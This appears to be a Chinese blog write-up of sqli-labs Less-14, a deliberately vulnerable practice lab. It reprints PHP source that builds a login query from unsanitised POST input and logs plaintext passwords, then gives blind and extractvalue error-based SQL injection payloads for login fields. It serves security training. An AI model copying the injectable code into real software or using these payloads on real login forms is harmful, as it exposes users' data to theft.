sqli-labs ————less -14

最新推荐文章于 2024-05-17 07:34:16 发布

FLy_鹏程万里

最新推荐文章于 2024-05-17 07:34:16 发布

阅读量567

点赞数

分类专栏：【渗透测试实战】 # Sqli-labs实战

本文链接：https://blog.csdn.net/Fly_hps/article/details/80279642

版权

【渗透测试实战】同时被 2 个专栏收录

160 篇文章 18 订阅

订阅专栏

Sqli-labs实战

76 篇文章 7 订阅

订阅专栏

Less-14

源代码：

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<title>Less-14- Double Injection- Double quotes- String</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome  <font color="#FF0000"> Dhakkan </font><br></div>

<div  align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">

<div style="padding-top:10px; font-size:15px;">
 

<!--Form to post the data for sql injections Error based SQL Injection-->
<form action="" name="form1" method="post">
	<div style="margin-top:15px; height:30px;">Username :    
	    <input type="text"  name="uname" value=""/>
	</div>  
	<div> Password  :    
		<input type="text" name="passwd" value=""/>
	</div></br>
	<div style=" margin-top:9px;margin-left:90px;">
		<input type="submit" name="submit" value="Submit" />
	</div>
</form>

</div></div>

<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="6" color="#FFFF00">

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
	$uname=$_POST['uname'];
	$passwd=$_POST['passwd'];

	//logging the connection parameters to a file for analysis.
	$fp=fopen('result.txt','a');
	fwrite($fp,'User Name:'.$uname."\n");
	fwrite($fp,'Password:'.$passwd."\n");
	fclose($fp);


	// connectivity
	$uname='"'.$uname.'"';
	$passwd='"'.$passwd.'"'; 
	@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result);

	if($row)
	{
  		//echo '<font color= "#0000ff">';	
  		
  		echo "<br>";
		echo '<font color= "#FFFF00" font size = 4>';
		//echo " You Have successfully logged in " ;
		echo '<font size="3" color="#0000ff">';	
		echo "<br>";
		//echo 'Your Login name:'. $row['username'];
		//echo "<br>";
		//echo 'Your Password:' .$row['password'];
		//echo "<br>";
		echo "</font>";
		echo "<br>";
		echo "<br>";
		echo '<img src="../images/flag.jpg" />';	
		
  		echo "</font>";
  	}
	else  
	{
		echo '<font color= "#0000ff" font size="3">';
		//echo "Try again looser";
		print_r(mysql_error());
		echo "</br>";
		echo "</br>";
		echo "</br>";
		echo '<img src="../images/slap.jpg"  />';	
		echo "</font>";  
	}
}

?>


</font>
</div>
</body>
</html>

根据源代码可以发现这是一个盲注

这里如果我们要构造payload，那么我们就需要闭合双引号，同时注释掉后面的语句，我们做一个简单的尝试：

成功，之后我们在这里加入我们要测试的语句来构建payload！

username：admin" and left(database(),1)>'a' #
password：aaa

之后我们可以使用一下报错注入测试一下：

username：admin"and extractvalue(1,concat(0x7e,(select @@version),0x7e))#

password：aaa

后续的内容与之前的差不多，这里就不再多说了！

FLy_鹏程万里

关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
打赏
0
评论
sqli-labs ————less -14

Less-14源代码：&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;&lt;html xmlns="http://www.w3.org/1999/xhtml"&gt;&lt;head&gt..
复制链接

扫一扫